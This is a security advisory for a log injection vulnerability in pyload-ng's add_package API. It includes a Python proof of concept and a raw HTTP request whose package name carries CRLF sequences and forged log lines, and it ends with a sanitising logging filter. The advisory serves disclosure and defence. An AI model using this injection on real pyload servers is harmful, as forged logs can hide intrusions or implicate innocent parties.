PT-2025-32447 · Pypi · Pyload-Ng
Published: 2025-07-30 · Updated: 2025-07-30
CVSS v3.1: 4.3 (Medium)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Summary
A log injection vulnerability was identified in pyload in the API /json/add_package. This vulnerability allows a user with add packages permission to inject arbitrary messages into the logs gathered by pyload.
Details
pyload generates a log entry when a new package is created through the API /json/add_package. The entry has the form Added package 'NAME OF PACKAGE' containing 'NUMBER OF LINKS' links. However, when the name of the new package contains a newline, the newline is not escaped. Newlines are also the delimiter between log entries, so the attacker can inject new log entries into the log file.
PoC
Run pyload in the default configuration with the following command:
pyload
We can now sign in as a pyload user who has at least add packages permissions. In my example, I will use the admin account to demonstrate this vulnerability. Now, as an admin user, view the logs at
http://localhost:8000/logs
Any attacker who has at least add packages permissions can now make the following request by crafting Python code to inject arbitrary logs.
```python
import requests

session = requests.session()

burp0_url = "http://localhost:8000/json/add_package"
burp0_cookies = {"pyload_session_8000": "SESSION-ID-HERE"}
burp0_headers = {
    "sec-ch-ua-platform": "\"Windows\"",
    "Accept-Language": "en-US,en;q=0.9",
    "sec-ch-ua": "\"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\"",
    "sec-ch-ua-mobile": "?0",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf",
    "Origin": "http://localhost:8000",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "http://localhost:8000/collector",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}

# Hand-built multipart body: the add_name field contains CRLF sequences
# followed by text shaped like pyload log entries.
burp0_data = (
    "------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\n"
    "Content-Disposition: form-data; name=\"add_name\"\r\n"
    "\r\n"
    "Fake new package containing 1 links\r\n"
    "[2025-07-23 04:32:19] PWNED SeaWind GET PWNED\r\n"
    "[2025-07-23 04:32:19] INFO pyload Added package Normal package\r\n"
    "------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\n"
    "Content-Disposition: form-data; name=\"add_links\"\r\n"
    "\r\n"
    "123\r\n"
    "------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\n"
    "Content-Disposition: form-data; name=\"add_password\"\r\n"
    "\r\n"
    "123\r\n"
    "------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\n"
    "Content-Disposition: form-data; name=\"add_file\"; filename=\"tt\"\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "\r\n"
    "------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\n"
    "Content-Disposition: form-data; name=\"add_dest\"\r\n"
    "\r\n"
    "0\r\n"
    "------WebKitFormBoundaryqRJM6zIUcE7ttXDf--\r\n"
)
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
```
The Burp Suite HTTP request for the above code:
```
POST /json/add_package HTTP/1.1
Host: localhost:8000
Content-Length: 799
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/collector
Accept-Encoding: gzip, deflate, br
Cookie: pyload_session_8000=SESSIONS-ID-HERE
Connection: keep-alive

------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_name"

Fake new package containing 1 links
[2025-07-23 04:32:19] HACKER SeaWind GET PWNED
[2025-07-23 04:32:19] INFO pyload Added package Normal package
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_links"

123
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_password"

123
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_file"; filename="tt"
Content-Type: application/octet-stream


------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_dest"

0
------WebKitFormBoundaryqRJM6zIUcE7ttXDf--
```
After executing the Python code above and sending the request successfully, if we look at the logs again, we see that the entry has been injected.

Impact
Forged or otherwise corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act.
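One way to neutralise the newline handling described under Details, as an added example that is not pyload's code or its actual fix: a `logging` filter that escapes control characters in the rendered message before it reaches the handler. The logger name, format string and function names are assumptions chosen to resemble the log lines shown above.

```python
import io
import logging
import unicodedata


def neutralize(text: str) -> str:
    """Escape backslashes, control characters and Unicode line/paragraph separators."""
    out = []
    for ch in text:
        if ch == "\\":
            out.append("\\\\")  # keeps a literal backslash-n distinct from an escaped newline
        elif unicodedata.category(ch) in ("Cc", "Zl", "Zp"):
            out.append(ch.encode("unicode_escape").decode("ascii"))
        else:
            out.append(ch)
    return "".join(out)


class SingleLineFilter(logging.Filter):
    """Render the message once, escape it, and drop args so it is not formatted again."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = neutralize(record.getMessage())
        record.args = None
        return True


def render_log(package_name: str, link_count: int) -> str:
    """Emit one 'Added package' entry through the filter and return the log text."""
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter(
        "[%(asctime)s] %(levelname)s %(name)s %(message)s", "%Y-%m-%d %H:%M:%S"))
    handler.addFilter(SingleLineFilter())
    logger = logging.getLogger("pyload-demo")  # hypothetical logger name
    logger.handlers = [handler]
    logger.propagate = False
    logger.setLevel(logging.INFO)
    logger.info("Added package {} containing {:d} links".format(package_name, link_count))
    return stream.getvalue()


# Constructed input modelled on the package name used in the PoC above.
FORGED = ("Fake new package containing 1 links\r\n"
          "[2025-07-23 04:32:19] PWNED SeaWind GET PWNED\r\n"
          "[2025-07-23 04:32:19] INFO pyload Added package Normal package")

if __name__ == "__main__":
    print(render_log(FORGED, 1), end="")
```

Because the filter escapes only the message, timestamps and tracebacks added by the formatter are left untouched, and the forged entries appear as visible `\r\n` text inside a single log line.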
Fix
Code Injection
Affected Products
Pyload-Ng